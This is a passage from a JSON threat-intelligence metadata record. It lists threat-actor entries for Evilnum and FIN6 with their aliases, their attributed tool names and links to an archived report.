				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434418,
	"ts_updated_at": 1775792063,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e0e40b169a48fedd9d1aebd59f36d125273fd26.pdf",
		"text": "https://archive.orkl.eu/4e0e40b169a48fedd9d1aebd59f36d125273fd26.txt",
		"img": "https://archive.orkl.eu/4e0e40b169a48fedd9d1aebd59f36d125273fd26.jpg"
	}
}